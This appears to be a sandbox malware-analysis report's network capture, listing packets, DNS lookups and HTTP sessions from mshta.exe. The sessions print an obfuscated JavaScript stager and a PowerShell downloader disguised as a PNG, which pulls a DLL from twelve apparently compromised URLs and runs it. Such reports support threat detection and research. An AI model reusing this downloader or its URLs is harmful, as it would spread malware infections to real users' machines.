Jan 28, 2022 20:58:57.408147097 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.408159018 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.408164024 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.408164978 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.408189058 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.591801882 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.591871023 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.591883898 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.591913939 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.591954947 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.591995001 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.591995001 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592036009 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592056990 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.592077017 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592116117 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592145920 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.592154980 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592195034 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592231989 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.592233896 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592276096 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592303991 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.592406988 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592447996 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592483997 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.592489004 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592529058 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592566013 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.592569113 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592611074 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592648029 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.592648029 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592688084 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592724085 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.592727900 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592767000 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592803955 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.592807055 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592847109 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592883110 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.592886925 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592928886 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.592966080 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.592967033 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593007088 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593041897 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.593045950 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593082905 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593117952 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.593122005 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593161106 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593199015 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.593199968 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593240976 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593277931 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.593277931 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593318939 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593353987 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.593357086 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593394041 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593430996 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.593432903 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593471050 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593509912 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593511105 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.593549967 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593585014 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:57.593586922 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:57.593642950 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:59:02.413335085 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:59:02.413392067 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:59:39.202697992 CET	80	49166	91.240.118.172	192.168.2.22
Jan 28, 2022 20:59:39.202874899 CET	49166	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:00:14.255675077 CET	49166	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:00:14.317039967 CET	80	49166	91.240.118.172	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 20:58:34.245244980 CET	52167	53	192.168.2.22	8.8.8.8
Jan 28, 2022 20:58:34.264126062 CET	53	52167	8.8.8.8	192.168.2.22
Jan 28, 2022 20:58:55.395302057 CET	50591	53	192.168.2.22	8.8.8.8
Jan 28, 2022 20:58:55.413871050 CET	53	50591	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 28, 2022 20:58:34.245244980 CET	192.168.2.22	8.8.8.8	0x872b	Standard query (0)	hostfeeling.com	A (IP address)	IN (0x0001)
Jan 28, 2022 20:58:55.395302057 CET	192.168.2.22	8.8.8.8	0x9ac	Standard query (0)	jurnalpjf.lan.go.id	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 28, 2022 20:58:34.264126062 CET	8.8.8.8	192.168.2.22	0x872b	No error (0)	hostfeeling.com		164.90.147.135	A (IP address)	IN (0x0001)
Jan 28, 2022 20:58:55.413871050 CET	8.8.8.8	192.168.2.22	0x9ac	No error (0)	jurnalpjf.lan.go.id		103.206.244.105	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

91.240.118.172

jurnalpjf.lan.go.id

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	91.240.118.172	80	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 20:58:29.342793941 CET	0	OUT	GET /gg/ff/fe.html HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.172 Connection: Keep-Alive
Jan 28, 2022 20:58:29.402276993 CET	2	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Fri, 28 Jan 2022 19:58:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 62 32 65 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 5b 30 5d 3d 27 25 36 44 5c 31 37 30 25 33 38 25 33 38 25 33 33 25 33 34 25 33 34 25 34 31 27 20 20 20 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7d 0c 7f 5c 5c 7f 31 7f 36 7f 32 7f 25 7f 32 7f 30 7d 19 7f 36 7f 31 7f 79 7f 25 7f 33 7f 37 7d 24 7f 44 7d 1d 7d 26 7f 32 7d 26 7f 33 7f 42 7d 20 7f 31 7d 19 7f 37 7f 31 7d 24 7f 38 7d 5c 27 7d 19 7f 32 7f 33 7f 25 7f 37 7f 34 7d 06 7d 19 7f 35 7f 36 7f 25 7f 36 7d 2a 7f 45 7f 66 7d 20 7f 32 7d 3e 7f 37 7f 6d 7f 43 7f 68 7d 41 7f 31 7f 72 7f 25 7f 34 7f 33 7d 48 7d 19 7f 34 7f 34 7f 65 7d 1d 7d 35 7f 33 7d 33 7f 33 7d 39 7f 32 7f 43 7d 24 7d 5b 7f 30 7d 1d 7f 39 7d 24 7f 42 7d 45 7f 31 7f 35 7f 37 7d 4f 7f 32 7d 35 7f 36 7d 64 7f 33 7d 28 7f 33 7d 62 7d 2d 7f 69 7d 24 7d 5f 7f Data Ascii: 2b2e<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode\|\|document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')\|lI1('per');f9f76c\|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'}\\162%20}61y%37}$D}}&2}&3B} 1}71}$8}\'}23%74}}56%6}*Ef} 2}>7mCh}A1r%43}H}44e}}53}33}92C}$}[0}9}$B}E157}O2}56}d3}(3}b}-i}$}_
Jan 28, 2022 20:58:29.402317047 CET	3	IN	Data Raw: 33 7d 1c 7d 5a 7d 24 7d 2c 7d 6f 7f 42 7d 41 7d 64 7f 32 7d 7e 7c 01 7d 63 7d 3a 7d 2e 7d 1a 7d 30 7f 31 7d 32 7d 7b 7d 1d 7d 7e 7d 70 7f 71 7d 31 7d 5b 7d 35 7f 37 7d 71 7d 7e 7f 36 7d 40 7f 37 7f 35 7d 3e 7f 36 7f 63 7d 3a 7f 34 7f 69 7d 48 7d Data Ascii: 3}}Z}$},}oB}A}d2}~\|}c}:}.}}01}2}{}}~}pq}1}[}57}q}~6}@75}>6c}:4i}H}AE}}\|}:}o}@}l\|7Bif}X}1d}Hcument}E}T4o\|\|\|6\|8M}S1}U}T5}\|(\|(\|1\| 6}9\|@\|7\|92Ea}>4\|V\|*\|}Uo}T\|O5\|6\|!\|REwr}>1t\|G\|/}2\|\|2}d\|}:
Jan 28, 2022 20:58:29.402357101 CET	4	IN	Data Raw: 2d 78 7b 7e 48 78 7e 78 30 7f 36 78 32 7f 3e 7f 54 7f 68 78 47 7f 73 77 5c 6e 7f 72 79 5a 7f 20 78 2a 78 1f 7f 20 7f 6f 7f 66 7f 20 7f 74 7f 68 7f 69 7f 73 7f 20 7b 57 7a 73 7f 20 77 25 77 5c 27 77 09 78 09 7f 63 78 09 78 5c 27 7f 62 7f 79 7f 20 Data Ascii: -x{~Hx~x06x2>ThxGsw\nryZ x*x of this {Wzs w%w\'wxcxx\'by <b~gxJxCxExxwx} xFCCw~#~% Guardx]nyzxJ~g/w6w4brww ul~2maxw"ox+w`w,ow.t yw wE~&wexZiw]zssxZJa} }p{&twt wv}y\|xw~
Jan 28, 2022 20:58:29.402399063 CET	6	IN	Data Raw: 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 2b 3d 27 32 7e 34 78 53 7f 6e 7e 34 7f 65 78 7a 78 2b 77 0f 77 3f 77 7a 62 77 42 78 32 7e 09 7f 72 7a 17 78 16 7e 70 7e 40 7f 2f 7e 42 7f 77 7f 2e 7f 70 77 2d 76 1a 76 47 7f 2e 78 2a 7f 6d 78 1b 78 5c 72 Data Ascii: 2KcI8HWQPA8[0]+='2~4xSn~4exzx+ww?wzbwBx2~rzx~p~@/~Bw.pw-vvG.x*mxx\r~Ixdx_x~.kx#wTw7vv0w;xIvxLxNxPxRxTxVxXxZx\\x^wkxaxcxexgsxixkxmfxoxq~0xtxvxxv?x\|x~vCwC0wwwwww\rv@w>x/0x1x">vM.Pw-WwJv&vUwOvwQw6yzawQ~du#v-/x
Jan 28, 2022 20:58:29.402443886 CET	7	IN	Data Raw: 28 71 38 7e 58 73 4b 78 66 78 6c 7e 5c 27 7f 3a 73 14 72 44 71 13 7b 69 71 15 7f 28 7f 37 7f 39 7f 2c 71 50 71 52 71 51 7b 21 71 52 73 36 71 56 71 59 71 58 71 5b 71 57 75 2d 77 55 7d 7a 62 7f 6b 7f 3b 71 46 78 47 7f 32 71 49 72 66 74 05 7f 65 72 Data Ascii: (q8~XsKxfxl~\':srDq{iq(79,qPqRqQ{!qRs6qVqYqXq[qWu-wU}zbk;qFxG2qIrfterrqMru38,47qoqq}hqo1s75,qQqQ{qwqwq^vGaqaqc 3qfqKqiqru0,qmpqnqtqQpqy,q\|qt}hqq`qbtxG4pu0qLrtqp\rqpqrq}z-q}qzp2q}p;q_pu.zawZtpqhqjp!
Jan 28, 2022 20:58:29.402487040 CET	8	IN	Data Raw: 25 32 39 25 32 43 25 36 43 25 33 30 25 33 44 6e 25 36 35 5c 31 36 37 25 32 30 5c 31 30 31 25 37 32 72 5c 31 34 31 25 37 39 25 32 38 25 32 39 25 32 43 49 25 36 43 25 33 44 25 33 31 25 33 32 25 33 38 25 33 42 64 5c 31 35 37 25 37 42 6c 25 33 30 25 Data Ascii: %29%2C%6C%30%3Dn%65\167%20\101%72r\141%79%28%29%2CI%6C%3D%31%32%38%3Bd\157%7Bl%30%5B%49l%5D%3D%53tr%69\156g%2EfromCh\141%72Co\144%65%28Il%29%7D\167%68%69%6Ce%28%2D%2DI%6C%29%3BIl%3D%31%32%38%3Bl%31%5B%30%5D%3D%6Ci%3Dl%30%5Bl%37%5B%30%5D%5D%3B%
Jan 28, 2022 20:58:29.402528048 CET	10	IN	Data Raw: 34 7f 53 7f 69 78 0f 73 2a 70 43 6f 58 6d 18 7f 28 7f 78 7f 75 7f 75 6e 62 6d 62 6d 21 72 31 6f 29 73 4b 7f 72 7f 3d 6f 40 77 23 6e 52 7e 2e 78 03 74 4c 75 2d 7f 64 70 37 7f 20 7f 44 6e 6d 6c 10 75 67 6f 69 6f 1a 74 1b 74 24 6f 2a 6c 34 73 4b 7f Data Ascii: 4SixspCoXm(xuunbmbm!r1o)sKr=o@w#nR~.xtLu-dp7 Dnmlugoiott$ol4sKo=s(}y(s,s.}Ks1s3(lroBfx,pzr25+{?n]lxG{kks,ks>kdospB+\'tDosOou;k/k1=ol1klOkk2k.k4tVtOtQx7k5lp{y}w xtXvN}dExc\|8Lw%vztw\'wz
Jan 28, 2022 20:58:29.402571917 CET	11	IN	Data Raw: 7f 2e 7e 3e 7f 69 75 2c 67 4d 67 59 7f 28 7f 38 67 63 67 5f 67 73 78 18 7f 34 67 5d 67 2e 7f 22 78 61 7e 7d 69 41 6f 67 77 79 7f 61 74 18 7f 73 77 26 78 39 7f 43 6c 0b 7f 65 68 52 7f 6a 68 56 6f 6d 67 56 7f 29 69 41 7f 63 66 12 7f 76 67 58 67 61 Data Ascii: .~>iu,gMgY(8gcg_gsx4g]g."xa~}iAogwyatsw&x9ClehRjhVomgV)iAcfvgXga(gssEg]gwffg^g`s>5pBffff9f#ff\'ff)yx+gsf,f+f&f(f}iyxf1s>xs~f.frgzf7s}pf?gysgx0s~fB08fDf<fIf3s>}xf\nffs.R}wfgMgDbgFnxZffJi_gNx,x
Jan 28, 2022 20:58:29.402606010 CET	12	IN	Data Raw: 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 62 33 52 5a 34 44 32 78 42 50 77 20 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 68 57 50 44 66 35 6c 74 53 37 4d 59 37 32 59 32 34 34 20 20 20 20 28 78 32 63 56 58 6c 33 39 29 3b 67 38 35 Data Ascii: (b17d7QLBh8gh);b3RZ4D2xBPw (b17d7QLBh8gh);hWPDf5ltS7MY72Y244 (x2cVXl39);g85tUx8O57Sri34='vE7JOE4YL7z2BEimBE630IL966M' ;eval(unescape('%71%79%36%28%22%63%37%39%38%66%62%36%39%66%22%29%3B'));cG3XHY59bDjh8i5+='syQqJrqlvQcnJERouTsFYMXOqfK
Jan 28, 2022 20:58:29.402631998 CET	12	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	91.240.118.172	80	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 20:58:34.140470028 CET	13	OUT	GET /gg/ff/fe.png HTTP/1.1 Host: 91.240.118.172 Connection: Keep-Alive
Jan 28, 2022 20:58:34.202456951 CET	14	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Fri, 28 Jan 2022 19:58:34 GMT Content-Type: image/png Content-Length: 1199 Connection: keep-alive Last-Modified: Fri, 28 Jan 2022 14:54:48 GMT ETag: "4af-5d6a59dbe5e00" Accept-Ranges: bytes Data Raw: 24 70 61 74 68 20 3d 20 22 43 7b 73 65 65 64 61 7d 3a 5c 50 72 7b 73 65 65 64 61 7d 6f 67 72 61 6d 44 7b 73 65 65 64 61 7d 61 74 61 5c 7b 73 65 65 64 61 7d 4a 6f 6f 53 65 65 2e 64 7b 73 65 65 64 61 7d 6c 6c 22 2e 72 65 70 6c 61 63 65 28 27 7b 73 65 65 64 61 7d 27 2c 27 27 29 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 68 6f 73 74 66 65 65 6c 69 6e 67 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 34 58 73 6a 74 4f 54 37 63 46 48 76 42 56 33 48 5a 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 75 72 6e 61 6c 70 6a 66 2e 6c 61 6e 2e 67 6f 2e 69 64 2f 61 73 73 65 74 73 2f 69 4d 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 69 74 2d 6f 2e 62 69 7a 2f 62 69 74 72 69 78 2f 78 6f 44 64 44 65 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 62 69 6d 65 73 61 72 61 79 65 6e 6f 76 69 6e 2e 69 72 2f 77 70 2d 61 64 6d 69 6e 2f 47 31 70 59 47 4c 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 67 61 72 64 65 6e 69 6e 67 66 69 6c 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 63 4d 56 55 59 44 51 33 71 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 64 61 69 73 79 2e 73 75 6b 6f 62 75 72 75 2d 73 65 63 75 72 65 2e 63 6f 6d 2f 38 70 6c 6b 73 2f 76 38 6c 79 5a 54 65 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 72 6f 70 65 72 74 79 2d 65 67 2e 63 6f 6d 2f 6d 6c 7a 6b 69 72 2f 39 37 76 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 74 6f 74 61 6c 70 6c 61 79 74 75 78 74 6c 61 2e 63 6f 6d 2f 73 69 74 69 6f 2f 44 67 6b 74 4c 33 7a 64 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 61 78 74 64 65 76 65 6c 6f 70 65 72 2e 63 6f 6d 2f 6f 6b 77 39 79 78 2f 47 63 32 38 5a 58 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 61 62 6c 72 2e 63 6f 6d 2f 65 6c 65 6e 63 74 69 63 2f 66 4d 46 74 52 72 62 73 45 58 31 67 58 75 33 5a 31 4d 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 61 63 74 69 76 65 74 72 61 69 6e 69 6e 67 2e 73 79 74 65 73 2e 6e 65 74 2f 6c 69 62 72 61 72 69 65 73 2f 38 73 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 75 64 61 6e 67 74 61 73 6f 72 69 63 68 69 6e 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 47 47 30 31 63 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/';$url2 = 'http://jurnalpjf.lan.go.id/assets/iM/';$url3 = 'http://it-o.biz/bitrix/xoDdDe/';$url4 = 'http://bimesarayenovin.ir/wp-admin/G1pYGL/';$url5 = 'http://gardeningfilm.com/wp-content/pcMVUYDQ3q/';$url6 = 'http://daisy.sukoburu-secure.com/8plks/v8lyZTe/';$url7 = 'https://property-eg.com/mlzkir/97v/';$url8 = 'http://totalplaytuxtla.com/sitio/DgktL3zd/';$url9 = 'http://maxtdeveloper.com/okw9yx/Gc28ZX/';$url10 = 'http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/';$url11 = 'http://activetraining.sytes.net/libraries/8s/';$url12 = 'https://gudangtasorichina.com/wp-content/GG01c/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } }
